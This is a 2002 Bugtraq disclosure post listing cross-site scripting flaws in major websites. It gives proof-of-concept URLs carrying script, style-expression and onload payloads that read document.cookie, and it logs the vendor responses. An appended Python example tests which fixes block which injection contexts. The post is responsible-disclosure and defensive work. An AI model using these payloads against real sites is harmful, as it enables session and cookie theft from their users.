[25195] in bugtraq
Cross site scripting in almost every major website
daemon@ATHENA.MIT.EDU (Berend-Jan Wever)
Sat Apr 20 16:20:57 2002
Date: 19 Apr 2002 17:28:06 -0000
Message-ID: <20020419172806.9886.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Berend-Jan Wever <skylined@edup.tudelft.nl>
To: bugtraq@securityfocus.com
On April 26 I posted a message about Cross-Site scripting (see bottom). I mentioned that I had found Cross-site scripting flaws in many major websites but I did not publish the exact details of these flaws. After notifying the owners of these sites and giving them time to respond and fix the problem, I now feel I have to post the details to bugtraq. This information and more on cross-site scripting can also be found on my website http://spoor12.edup.tudelft.nl/skylined which is updated almost daily.
Kind regards,
Berend-Jan Wever.
Cross-site scripting archive:
Here are all the sites that I know to have at least one cross-site scripting flaw. I have logged all the communication I have had with them. (Last update April 19, 2002)
www.search.com
http://www.search.com/search?q='><SCRIPT>alert(document.cookie)</SCRIPT>'
- 23 mar 2002 Reported @ "http://www.cnet.com/cnetsupport/contact/1,10161,0-3945,00.html"
- 28 mar 2002 Reported @ "http://www.search.com/feedback/"
--------------------------------------------------------------------------------
www.altavista.com
http://www.altavista.com/sites/search/web?q=*&kl="><SCRIPT>alert(document.cookie)</SCRIPT>
- 23 mar 2002 Reported @ "http://help.altavista.com/contact/search"
- 25 mar 2002 Reply by email: "We have forwarded your email to our engineering team for further investigation"
--------------------------------------------------------------------------------
edit.yahoo.com
http://edit.yahoo.com/config?.done="%20style="width:expression(document.write(document.cookie));
- 27 mar 2002 Reported to "arturo@yahoo-inc.com", "mfk@yahoo-inc.com"
--------------------------------------------------------------------------------
search.netscape.com
addressbook.netscape.com
http://search.netscape.com/search.psp?search="><SCRIPT>alert(document.cookie)</SCRIPT>
http://addressbook.netscape.com/search.adp?SearchStr="><SCRIPT>alert(document.cookie)</SCRIPT>
(Addressbook.netscape.com requires you to be logged in)
- 23 mar 2002 Reported @ "http://help.netscape.com/website/feedback.html"
--------------------------------------------------------------------------------
cq-search.ebay.com
http://cq-search.ebay.com/search/search.dll?MfcISAPICommand=GetResult&ht="><SCRIPT>alert(document.cookie)</SCRIPT>&query=a
- 26 mar 2002 Reported to "clalonde@ebay.com"
- 27 mar 2002 Reply by email: "Reviewing the issue", "Do you have any suggestions?"
- 27 mar 2002 Gave some hints and told them about my CSS howto.
--------------------------------------------------------------------------------
www.amazon.com
http://www.amazon.com/exec/obidos/ASIN/B00005T68P/ref%3D%20style%3Dwidth%3Aexpression%28document.write%28document.cookie%29%29%20/
- 23 mar 2002 Reported @ "http://www.amazon.com/exec/obidos/handle-generic-form/102-3185800-6674542?action=next-page&target=stores/help/self-service-email-form-dispatch.html&display=basic&browse=560710&method=GET&cgi-post-result=1/102-3185800-6674542."
- 26 mar 2002 "Cyrus@amazon.com" responded to my bugtraq post
- 26 mar 2002 Reported to "Cyrus@amazon.com"
- 26 mar 2002 Told them about my CSS howto.
--------------------------------------------------------------------------------
www.looksmart.com
cnn.looksmart.com
http://www.looksmart.com/r_search?look=&key=><SCRIPT>alert(document.cookie)</SCRIPT>
http://cnn.looksmart.com/r_search?look=&key=><SCRIPT>alert(document.cookie)</SCRIPT>
- 23 mar 2002 Reported to "feedback@looksmart.net"
--------------------------------------------------------------------------------
www.time.com
http://www.time.com/time/searchresults?query=a&summaries="%20style="width:expression(document.write(document.cookie))"
- 23 mar 2002 Reported to "daily@timeinc.net"
- 26 mar 2002 Reported to "Renee_Guttmann@timeinc.com"
--------------------------------------------------------------------------------
www.infospace.com
http://www.infospace.com/info.xcite/dog/newsresults.htm?&qkw="><SCRIPT>alert(document.cookie)</SCRIPT>&qcat=news&fs=nws
- 23 mar 2002 Reported @ "http://www.infospace.com/info/redirs_all.htm?pgtarg=abtct&"
--------------------------------------------------------------------------------
www.lasseters.com.au
http://www.lasseters.com.au/default3.asp?Network="%20onload="alert(document.cookie);"%20z="
- 28 mar 2002 Reported @ "http://www.lasseters.com.au/help/onetoone.html" to Karl F (chatid 114640)
- 28 mar 2002 Reported to "support@lasseters.com.au"
- 28 mar 2002 (Automated) reply by email: "our priority is to respond to your query as soon as possible", tracking number T20020328004M
- 28 mar 2002 Reply by email: "We are investigating this issue very seriously", "I have passed this information onto the relevant department"
--------------------------------------------------------------------------------
my.abcnews.go.com
http://my.abcnews.go.com/localpageMainHandler?input=<SCRIPT>alert(document.cookie)</SCRIPT>
- 28 mar 2002 Reported @ "http://abcnews.go.com/service/Help/abccontactform.html"
Fixed cross-site scripting flaws archive:
Here are all the cross-site scripting flaws I uncovered which have been fixed now. This is just to show how it was done and who have been found wanting.
www.redhat.com
http://www.redhat.com/apps/search/results.html?ie="><SCRIPT>alert(document.cookie)</SCRIPT>
- 26 mar 2002 "mjc@redhat.com" responded to my bugtraq post.
- 26 mar 2002 Reported to "mjc@redhat.com"
- 26 mar 2002 Reply from "tlancast@redhat.com": "Fixed now"
--------------------------------------------------------------------------------
www.hotmail.com
See my MSN Hotmail Cross-site scripting page for more information
- 19 mar 2002 Reported @ "Report a bug on the Hotmail website" (url contained sensitive information ;)~
- 22 mar 2002 Reported to "support@hotmail.com" - bounced
- 23 mar 2002 Reply from "abuse@css.one.microsoft.com": "Look at the help if you have any problems using hotmail"
- 27 mar 2002 Explained it was a serious issue to "abuse@css.one.microsoft.com"
- 27 mar 2002 Reply from "abuse@css.one.microsoft.com": "Your e-mail has been forwarded to the appropriate team"
- 28 mar 2002 Reply from "support_x@css.one.microsoft.com": "We have tried to reproduce the error, but have been unable to do so"
- 29 mar 2002 Sent a working example to "cs_serv@hotmail.com"
- 30 mar 2002 Reply from "cs_serv@hotmail.com": "We have confirmed the issue that you describe and are currently working on a fix"
- 30 mar 2002 Reply from "cs_serv@hotmail.com": "we have isolated the bug and expect to have a fix for it out by Wednesday." (3 apr 2002)
The fix: as far as I could find out they now replace the properties 'dataFld', 'dataFormatAs' and 'dataSrc' of any HTML tag with 'xdataFld', 'xdataFormatAs' and 'xdataSrc' to prevent XML generation of HTML altogether.
MSN Hotmail has been very polite to thank me for bringing this to their attention multiple times.
--------------------------------------------------------------------------------
search.microsoft.com
http://search.microsoft.com/default.asp?qu=";%0D%0Aalert(document.cookie);%0D%0Aa="&boolean=ALL
This one was fixed within hours after discovery and without me notifying microsoft, now that's service!
--------------------------------------------------------------------------------
www.google.com
http://www.google.nl/search?as_q=a&ie="><SCRIPT>alert(document.cookie)</SCRIPT>
- 23 mar 2002 Reported to "webmaster@google.com"
- 23 mar 2002 (Automated) reply by email: "you'll hear from us soon"
The fix: all '<' and '>' characters are replaced with '_'.
I have not received a word from Google except for the automated responses. (Guess whether I'm gonna report the next CSS to them...)
--------------------------------------------------------------------------------
www.nic.cc
http://www.nic.cc/cgi-bin/cart?domain=<SCRIPT>alert(document.cookie)</SCRIPT>
- 23 mar 2002 Reported to "clientcare@enic.cc"
The fix: filter out '<' and '>'.
I have not received a word from Nic.cc. (Guess whether I'm gonna report the next CSS to them...)
--------------------------------------------------------------------------------
support.microsoft.com
http://support.microsoft.com/default.aspx?scid=');}alert(document.cookie);{//
- 28 mar 2002 Reported to "support@microsoft.com"
- 28 mar 2002 (Automated) reply by email: "Your e-mail <snip> will be handled personally by one of our Customer Service Representatives within 24 hours"
The fix: The ' in the exploit url used to end a string but this string is now enclosed by " instead of ', the " character is filtered out.
I have not received a word from microsoft support except for the automated responses. (Guess whether I'm gonna report the next CSS to them...)
--------------------------------------------------------------------------------
download.cnet.com
http://download.cnet.com/downloads/1,10150,0-10001-103-0-1-7,00.html?qt=<SCRIPT>alert(document.cookie)</SCRIPT>
- 28 mar 2002 Reported @ "http://download.cnet.com/downloads/0-10000-7-1532857.html?tag=subnav"
The fix: The characters <, > and " are replaced with &lt;, &gt; and &quot;.
--------------------------------------------------------------------------------
www.nu
http://www.nu/tour/tour_images.cfm?ID=EN&site=<SCRIPT>alert(document.cookie)</SCRIPT>
(The error report would suggest a SQL-injection vulnerability but I have not done further testing.)
- 23 mar 2002 Reported both CSS & SQL-injection to "dwd@mail.nic.nu"
- 19 apr 2002 The bug seems to have been fixed.
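The fixes listed in the archive fall into two families: dropping or replacing '<' and '>' (Google, nic.cc) and entity-encoding the output (download.cnet.com). The check below, an added example that is neither code from this post nor from any of the sites named in it, reconstructs both fixes on a constructed results page and runs them against the injection contexts the archive's URLs use, showing why the first family leaves the attribute-context cases (the onload and style payloads) alive. The function names, the page template and the samples are assumptions for the example.

```python
import html
from html.parser import HTMLParser

# Added example: reconstructed fixes, not any site's real code.
def strip_angle_brackets(value: str) -> str:
    """The nic.cc / Google style fix: neutralise only '<' and '>'."""
    return value.replace("<", "").replace(">", "")

def html_encode(value: str) -> str:
    """Entity-encode &, <, >, " and ' (the download.cnet.com style fix)."""
    return html.escape(value, quote=True)

def render_search_page(query: str, sanitize) -> str:
    """Constructed results page: the query lands both in element text and
    inside a double-quoted attribute, the two contexts seen in the archive."""
    q = sanitize(query)
    return (f"<p>Results for {q}</p>\n"
            f'<input type="text" name="q" value="{q}">')

class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []  # (tag name, {attribute: value}) for every start tag

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def injected(page: str) -> bool:
    """True if the query produced any element or attribute the template did
    not define (a <script> element, an onload= or style= attribute, ...)."""
    parser = _TagCollector()
    parser.feed(page)
    parser.close()
    for tag, attrs in parser.tags:
        if tag not in ("p", "input"):
            return True
        if tag == "input" and set(attrs) - {"type", "name", "value"}:
            return True
    return False

# Constructed samples mirroring the archive's URLs (URL-decoded).
SAMPLES = {
    "element": "<SCRIPT>alert(document.cookie)</SCRIPT>",
    "breakout": '"><SCRIPT>alert(document.cookie)</SCRIPT>',
    "onload": '" onload="alert(document.cookie);" z="',
    "style": '" style="width:expression(document.write(document.cookie))',
}

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        for fix in (strip_angle_brackets, html_encode):
            hit = injected(render_search_page(payload, fix))
            print(f"{fix.__name__:>20} {name:>8}: injected={hit}")
```

Stripping angle brackets is enough for the element-text case, which is why the sites that did only that saw their test URL stop working; only encoding the quote as well closes the attribute cases.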